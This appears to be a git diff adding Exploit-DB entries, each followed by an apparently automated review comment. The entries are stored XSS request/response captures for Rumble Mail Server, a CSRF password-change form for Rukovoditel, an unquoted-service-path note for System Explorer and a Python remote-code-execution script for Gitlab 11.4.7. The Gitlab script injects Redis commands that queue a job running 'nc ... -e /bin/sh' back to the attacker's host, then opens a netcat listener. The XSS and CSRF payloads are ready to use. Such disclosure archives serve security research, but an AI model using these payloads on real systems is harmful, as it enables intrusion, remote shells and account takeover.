+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h1>Server settings</h1>
+
+Saving config/rumble.conf
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
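Review bot: The request and the server response are pasted back to back with no separator, so the `HTTP/1.1 302 Moved` status line follows directly after the form body. A blank line and a `# Response:` marker before it would match the `# Exploit:` marker used for the request. The evidence is also inconsistent: the submitted `servername` is `alert("xss.com")`, but the response shows `alert(xss.com)` without quotes, so the file should say whether the server strips them or the capture was edited. The `Authorization: Basic` value decodes to `admin:admin`, so the setting is changed by an authenticated administrator, and the header block should state that precondition. The 49254.txt section has the same missing separator and unstated precondition.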
diff --git a/exploits/multiple/webapps/49254.txt b/exploits/multiple/webapps/49254.txt
new file mode 100644
index 000000000..c94a10cea
--- /dev/null
+++ b/exploits/multiple/webapps/49254.txt
@@ -0,0 +1,105 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Info
+The parameters `domain` and `path` are vulnerable to stored XSS.
+
+# Exploit:
+POST /domains HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 119
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/domains?domain=%3Cscript%3Ealert(
+Upgrade-Insecure-Requests: 1
+
+domain=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&path=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&create=true
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+  <h2>Domains</h2>
+<p>
+  <table class="elements" border='0' cellpadding='5' cellspacing='1'><tr><th>Create a new domain</th></tr><tr><td><b><font color='darkgreen'>Domain <script>alert("XSS")</script> has been created.</font></b></td></tr><tr><td>			<form action="/domains" method="post" id='create'>
+			<div>
+			<div >
+				<div class='form_key'>
+					Domain name:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="domain"/>
+				</div>
+			</div>
+
+			<div>
+				<div class='form_key'>
+					Optional alt. storage path:
+				</div>
+				<div class='form_value'>
+					<input type="text" name="path"/>
+				</div>
+			</div>
+
+
+			<div class='form_el' id='domainsave' >
+				<div class='form_key'>
+						<input type="hidden" name="create" value="true"/>
+					<input class="button" type="submit" value="Save domain"/>
+					<input class="button"  type="reset" value="Reset"/>
+				</div>
+			</div>
+			<br/><br/><br/><br/><br />
+			</div>
+			</form>
+			</td></tr></table></p>
+<p>&nbsp;</p>
+<table class="elements" border='0' cellpadding='5' cellspacing='1'>
+  <tr><th>Domain</th><th>Actions</th></tr>
+<tr><td><img src='/icons/house.png' align='absmiddle'/>&nbsp;<a href='/accounts:<script>alert("XSS")</script>'><strong><script>alert("XSS")</script></strong></a></td><td><a href="/domains:<script>alert("XSS")</script>"><img title='Edit domain' src='/icons/report_edit.png' align='absmiddle'/></a>  <a href="/domains?domain=<script>alert("XSS")</script>&delete=true"><img title='Delete domain' src='/icons/delete.png' align='absmiddle'/></a></td></tr></table>
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
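Review bot: The `# Info` line says both `domain` and `path` are vulnerable, but the response shown only renders the `domain` value, in the "has been created" message and in the domain table; nothing in the capture shows where `path` is output. Narrow the claim to `domain` unless the author can point to the page that renders `path` unescaped. The `Referer:` header is cut off at `domains?domain=%3Cscript%3Ealert(` and should be completed or removed so the capture is a well-formed request.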
diff --git a/exploits/multiple/webapps/49255.txt b/exploits/multiple/webapps/49255.txt
new file mode 100644
index 000000000..50b5847d1
--- /dev/null
+++ b/exploits/multiple/webapps/49255.txt
@@ -0,0 +1,146 @@
+# Exploit Title: Rumble Mail Server 0.51.3135 - 'username' Stored XSS
+# Date: 2020-9-3
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://rumble.sf.net/
+# Software Link:  https://sourceforge.net/projects/rumble/files/Windows%20binaries/rumble_0.51.3135-setup.exe
+# Version: Version 0.51.3135
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Exploit:
+POST /users HTTP/1.1
+Host: 127.0.0.1:2580
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 96
+Origin: http://127.0.0.1:2580
+Authorization: Basic YWRtaW46YWRtaW4=
+Connection: keep-alive
+Referer: http://127.0.0.1:2580/users
+Upgrade-Insecure-Requests: 1
+
+username=%3Cscript%3Ealert%28%22M507%22%29%3C%2Fscript%3E&password=admin&rights=*&submit=Submit
+HTTP/1.1 200 OK
+Connection: close
+Content-Type: text/html
+
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
+<link rel="shortcut icon" href="/favicon.ico " />
+<title>RumbleLua</title>
+<link href="rumblelua2.css" rel="stylesheet" type="text/css" />
+</head>
+<body>
+<div class="header_top">
+  <div class="header_stuff">
+    RumbleLua on a.com<br />
+    <span class="fineprint">Rumble Mail Server v/0.51.3135 <br />
+    </span>
+
+<a href="/"><img src="/icons/computer.png" align="absmiddle" /> Server status</a>
+<a href="/domains"><img src="/icons/house.png" align="absmiddle" /> Domains & accounts</a>
+
+<a href="/users"><img src="/icons/group.png" align="absmiddle" /> RumbleLua users</a>
+<a href="/settings"><img src="/icons/report_edit.png" align="absmiddle" /> Server settings</a>
+<a href="/modules"><img src="/icons/plugin_edit.png" align="absmiddle" /> Set up modules</a>
+<a href="/systeminfo"><img src="/icons/page_white_find.png" align="absmiddle" /> System logs</a>
+<a href="/queue"><img src="/icons/clock.png" align="absmiddle" /> Mail queue</a>
+
+</div>
+</div>
+<div id="contents">
+
+
+<h1>RumbleLua users </h1>
+<p>This page allows you to create, modify or delete accounts on the RumbleLua system.<br />
+Users with <img src="../icons/action_lock.png" alt="lock" width="24" height="24" align="absmiddle" /><span style="color:#C33; font-weight:bold;"> Full control</span> can add, edit and delete domains as well as change server settings, <br />
+while regular users can only
+see and edit the domains they have access to.
+</p>
+<table class="elements">
+  <tr>
+    <th>Create a new user:</th>
+  </tr>
+<tr>
+<td>
+<form action="/users" method="post" name="makeuser">
+
+  <div style="width: 300px; text-align:right; float: left;">
+    <label for="username"><strong>Username:</strong></label>
+    <input name="username" autocomplete="off" type="text" id="username" >
+    <br>
+    <label for="password"><strong>Password:</strong></label>
+    <input type="password" autocomplete="off" name="password" id="password">
+    <br />
+    <label for="password"><strong>Access rights:</strong></label>
+    <select name="rights" size="4" style="width: 150px;" multiple="multiple">
+    <option value="*" style="color:#C33; font-weight:bold;">Full control</option>
+    <optgroup label="Domains:">
+        </optgroup>
+    </select>
+      </div>
+    <p><br /><br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+<br />
+
+      &nbsp;&nbsp;
+      <input type="submit" name="submit" id="submit" value="Submit" />
+    </p>
+
+</form>
+</td>
+</tr>
+</table>
+<table width="200" class="elements">
+  <tr>
+    <th>Username</th>
+    <th>Rights</th>
+    <th>Actions</th>
+  </tr>
+  <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M507")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("M507")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("M507")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'>admin</font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=admin&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=admin&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+    <tr>
+    <td><img src="/icons/action_lock.png" align="absmiddle"/>&nbsp;<strong><font color='#006600'><script>alert("M5072")</script></font></strong></td>
+    <td>Full control</td>
+    <td>
+	<a href="/users?user=<script>alert("XSS")</script>&edit=true"><img src="/icons/action_edit.png" title="Edit" align="absmiddle"/></a>&nbsp;
+	<a href="/users?user=<script>alert("XSS")</script>&delete=true"><img src="/icons/action_delete.png" title="Delete" align="absmiddle"/></a>
+	</td>
+  </tr>
+  </table>
+<p>&nbsp;</p>
+
+
+</div>
+<br />
+<p align="center">
+Powered by Rumble Mail Server - [<a href="https://sourceforge.net/p/rumble/wiki/Home/">wiki</a>] [<a href="https://sourceforge.net/projects/rumble/">project home</a>]
+</p>
+</body>
+
+
+</html>
\ No newline at end of file
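Review bot: The write-up never states the precondition or the root cause, although both are visible in the capture. The request carries `Authorization: Basic YWRtaW46YWRtaW4=` (admin:admin), so storing the value already requires a RumbleLua admin login, and the response echoes the username unescaped in two contexts: element text inside `<font>` and the `href` of the edit/delete links. A short `# Description:` section saying this, with the remediation (HTML-encode the name in text, URL-encode it in the `user=` query value), would let a defender judge severity without decoding headers. The captured response also does not look like a clean state: the third table row shows `alert("M5072")` as text but `alert("XSS")` in its links, apparently left over from earlier tests, so either explain those rows or trim them.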
diff --git a/exploits/php/webapps/49245.txt b/exploits/php/webapps/49245.txt
new file mode 100644
index 000000000..b67419f9e
--- /dev/null
+++ b/exploits/php/webapps/49245.txt
@@ -0,0 +1,30 @@
+# Exploit Title: Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change 
+password)
+# Date: 2020-12-14
+# Exploit Author: KeopssGroup0day,Inc
+# Vendor Homepage: https://www.rukovoditel.net/
+# Software Link: https://www.rukovoditel.net/download.php
+# Version: v2.6.1
+# Tested on: Kali Linux
+
+POC(localhost/index.php?module=users/change_password):
+
+<html>
+   <!-- CSRF PoC  -->
+   <body>
+   <script>history.pushState('', '', '/')</script>
+     <form 
+action="https://localhost/index.php?module=users/change_password&action=change" 
+method="POST">
+       <input type="hidden" name="form&#95;session&#95;token" 
+value="D&#94;HUyTDh0X" />
+       <input type="hidden" name="password&#95;new" value="123456789" />
+       <input type="hidden" name="password&#95;confirmation" 
+value="123456789" />
+       <input type="submit" value="Submit request" />
+     </form>
+   </body>
+</html>
+
+
+--
\ No newline at end of file
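Review bot: The PoC form posts a hard-coded `form_session_token` (`value="D&#94;HUyTDh0X"`), but the write-up never says whether the server validates it, which is the deciding question for a CSRF claim. If the token is checked per session, the form as written would only be accepted in the session it was captured from. Add one line under the header recording what was actually observed, for example `# Note: request accepted with a stale form_session_token and without the current password`, if that is what was tested. The title is also wrapped, so `password)` on the second line has lost its `#` and the header no longer reads as a single `# Exploit Title:` field, and the trailing `--` line is a mail-signature remnant that can be dropped.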
diff --git a/exploits/ruby/webapps/49257.py b/exploits/ruby/webapps/49257.py
new file mode 100755
index 000000000..e44dae0c7
--- /dev/null
+++ b/exploits/ruby/webapps/49257.py
@@ -0,0 +1,64 @@
+# Exploit Title: Gitlab 11.4.7 - Remote Code Execution
+# Date: 14-12-2020
+# Exploit Author: Fortunato Lodari fox [at] thebrain [dot] net, foxlox
+# Vendor Homepage: https://about.gitlab.com/
+# POC: https://liveoverflow.com/gitlab-11-4-7-remote-code-execution-real-world-ctf-2018/
+# Tested On: Debian 10 + Apache/2.4.46 (Debian)
+# Version: 11.4.7 community
+
+import sys
+import requests
+import time
+import random
+import http.cookiejar
+import os.path
+from os import path
+
+# Sign in GitLab 11.4.7  portal and get (using Burp or something other):
+# authenticity_token
+# authenticated cookies
+# username
+# specify localport and localip for reverse shell
+
+username='aaaaaaaaaaaa'
+authenticity_token='jpT/n1EoPwwWtiGu/+QKVQomofMNyqAQXY+iD2kVoRQoiQNzcFHPAj2+M4pyblKo/7UkClKW8jvp51Aw2qzs7g=='
+cookie = '_gitlab_session=c942527505cc0580c026610a1799b811; sidebar_collapsed=false'
+localport='1234'
+localip='192.168.0.114'
+
+
+url = "http://192.168.0.130:5080"
+proxies = { "http": "http://localhost:8080" }
+
+
+def deb(str):
+    print("Debug => "+str)
+
+def create_payload(authenticity_token,prgname,namespace_id,localip,localport,username):
+    return {'utf8':'✓','authenticity_token':authenticity_token,'project[ci_cd_only]':'false','project[name]':prgname,'project[namespace_id]':namespace_id,'project[path]':prgname,'project[description]':prgname,'project[visibility_level]':'20','':'project[initialize_with_readme]','project[import_url]':'git://[0:0:0:0:0:ffff:127.0.0.1]:6379/\n multi\n sadd resque:gitlab:queues system_hook_push\n lpush resque:gitlab:queue:system_hook_push "{\\"class\\":\\"GitlabShellWorker\\",\\"args\\":[\\"class_eval\\",\\"open(\'|nc '+localip+' '+localport+' -e /bin/sh\').read\\"],\\"retry\\":3,\\"queue\\":\\"system_hook_push\\",\\"jid\\":\\"ad52abc5641173e217eb2e52\\",\\"created_at\\":1513714403.8122594,\\"enqueued_at\\":1513714403.8129568}"\n exec\n exec\n exec\n/'+username+'/'+prgname+'.git'}
+
+import string
+def random_string(length):
+    return ''.join(random.choice(string.ascii_letters) for m in range(length))
+
+def init(username,cookie,authenticity_token,localport,localip):
+    from bs4 import BeautifulSoup
+    import re
+    import urllib.parse
+    deb("Token: "+authenticity_token)
+    deb("Cookie: "+cookie)
+    session=requests.Session()
+    headers = {'user-agent':'Moana Browser 1.0','Cookie':cookie,'Content-Type':'application/x-www-form-urlencoded','DNT':'1','Upgrade-Insecure-Requests':'1'}
+    r=session.get(url+'/projects/new',headers=headers,allow_redirects=True)
+    soup = BeautifulSoup(r.content,"lxml")
+    nsid = soup.findAll('input', {"id": "project_namespace_id"})
+    namespace_id=nsid[0]['value'];
+    deb("Namespace ID: "+namespace_id)
+    prgname=random_string(8)
+    newpayload=create_payload(authenticity_token,prgname,namespace_id,localip,localport,username)
+    newpayload=urllib.parse.urlencode(newpayload)
+    deb("Payload encoded: "+newpayload)
+    r=session.post(url+'/projects',newpayload,headers=headers,allow_redirects=False)
+    os.system("nc -nvlp "+localport)
+
+init(username,cookie,authenticity_token,localport,localip)
\ No newline at end of file
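Review bot: The module-level `authenticity_token` and `cookie` assignments commit what look like a captured CSRF token and `_gitlab_session` value, and `init` then prints both via `deb("Token: "+authenticity_token)` and `deb("Cookie: "+cookie)`. Session material should be a labelled placeholder such as `cookie = '_gitlab_session=<SESSION_COOKIE>'` and should not be echoed to stdout. `os.system("nc -nvlp "+localport)` builds a shell string from a variable, and `subprocess.run(["nc", "-nvlp", localport])` would avoid the shell. Smaller points: `def deb(str)` shadows the builtin, `proxies`, `time`, `http.cookiejar` and `path` are never used, and `import string` sits mid-file. The header also gives no CVE identifier or fixed version, which a defender needs to map this entry to the vendor advisory.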
diff --git a/exploits/windows/local/49248.txt b/exploits/windows/local/49248.txt
new file mode 100644
index 000000000..3b3f8ec5f
--- /dev/null
+++ b/exploits/windows/local/49248.txt
@@ -0,0 +1,29 @@
+# Exploit Title: System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path
+# Date: 2020-10-14
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: http://systemexplorer.net/
+# Software Link:  http://systemexplorer.net/download/SystemExplorerSetup.exe
+# Version: Version 7.0.0
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+# Service info:
+
+C:\Users\m507>sc qc SystemExplorerHelpService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: SystemExplorerHelpService
+        TYPE               : 20  WIN32_SHARE_PROCESS
+        START_TYPE         : 3   DEMAND_START
+        ERROR_CONTROL      : 0   IGNORE
+        BINARY_PATH_NAME   : C:\Program Files (x86)\System Explorer\service\SystemExplorerService64.exe
+        LOAD_ORDER_GROUP   :
+        TAG                : 0
+        DISPLAY_NAME       : System Explorer Service
+        DEPENDENCIES       :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
+
+
+# Exploit:
+This vulnerability could permit executing code during startup or reboot with the escalated privileges.
\ No newline at end of file
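Review bot: The `# Exploit:` sentence says code would run "during startup or reboot", but the `sc qc` output above it shows `START_TYPE : 3 DEMAND_START`, so the service starts on demand rather than at boot. The statement should be corrected or the actual trigger explained. The write-up also omits the precondition that makes an unquoted `BINARY_PATH_NAME` matter, namely write access to a parent directory of `C:\Program Files (x86)\System Explorer\service\`, and shows no ACL output to support it. Without that evidence the entry documents a misconfiguration rather than a demonstrated escalation. A remediation line would help defenders: quote the service's image path so the space-containing path is parsed as a single token.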
diff --git a/files_exploits.csv b/files_exploits.csv
index 68282e8af..7875249b9 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11230,6 +11230,7 @@ id,file,description,date,author,type,platform,port
 49211,exploits/windows/local/49211.ps1,"Druva inSync Windows Client 6.6.3 - Local Privilege Escalation (PowerShell)",2020-12-07,1F98D,local,windows,
 49221,exploits/multiple/local/49221.java,"Tibco ObfuscationEngine 5.11 - Fixed Key Password Decryption",2020-12-09,"Thomas Sluyter",local,multiple,
 49226,exploits/windows/local/49226.txt,"PDF Complete 3.5.310.2002 - 'pdfsvc.exe' Unquoted Service Path",2020-12-10,"Zaira Alquicira",local,windows,
+49248,exploits/windows/local/49248.txt,"System Explorer 7.0.0 - 'SystemExplorerHelpService' Unquoted Service Path",2020-12-14,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43463,3 +43464,15 @@ id,file,description,date,author,type,platform,port
 49241,exploits/php/webapps/49241.txt,"Courier Management System 1.0 - 'First Name' Stored XSS",2020-12-11,Zhaiyi,webapps,php,
 49242,exploits/php/webapps/49242.txt,"Courier Management System 1.0 - 'MULTIPART street ((custom) ' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
 49243,exploits/php/webapps/49243.txt,"Courier Management System 1.0 - 'ref_no' SQL Injection",2020-12-11,Zhaiyi,webapps,php,
+49245,exploits/php/webapps/49245.txt,"Rukovoditel 2.6.1 - Cross-Site Request Forgery (Change password)",2020-12-14,KeopssGroup0day_Inc,webapps,php,
+49246,exploits/multiple/webapps/49246.py,"LibreNMS 1.46 - MAC Accounting Graph Authenticated SQL Injection",2020-12-14,Hodorsec,webapps,multiple,
+49247,exploits/multiple/webapps/49247.py,"MiniWeb HTTP Server 0.8.19 - Buffer Overflow (PoC)",2020-12-14,securityforeveryone.com,webapps,multiple,
+49249,exploits/multiple/webapps/49249.txt,"Seacms 11.1 - 'ip and weburl' Remote Command Execution",2020-12-14,j5s,webapps,multiple,
+49250,exploits/multiple/webapps/49250.txt,"Seacms 11.1 - 'file' Local File Inclusion",2020-12-14,j5s,webapps,multiple,
+49251,exploits/multiple/webapps/49251.txt,"Seacms 11.1 - 'checkuser' Stored XSS",2020-12-14,j5s,webapps,multiple,
+49252,exploits/multiple/webapps/49252.txt,"WordPress Plugin Total Upkeep 1.14.9 - Database and Files Backup Download",2020-12-14,Wadeek,webapps,multiple,
+49253,exploits/multiple/webapps/49253.txt,"Rumble Mail Server 0.51.3135 - 'servername' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49254,exploits/multiple/webapps/49254.txt,"Rumble Mail Server 0.51.3135 - 'domain and path' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49255,exploits/multiple/webapps/49255.txt,"Rumble Mail Server 0.51.3135 - 'username' Stored XSS",2020-12-14,"Mohammed Alshehri",webapps,multiple,
+49256,exploits/hardware/webapps/49256.py,"Macally WIFISD2-2A82 2.000.010 - Guest to Root Privilege Escalation",2020-12-14,"Maximilian Barz",webapps,hardware,
+49257,exploits/ruby/webapps/49257.py,"Gitlab 11.4.7 - Remote Code Execution",2020-12-14,"Fortunato Lodari",webapps,ruby,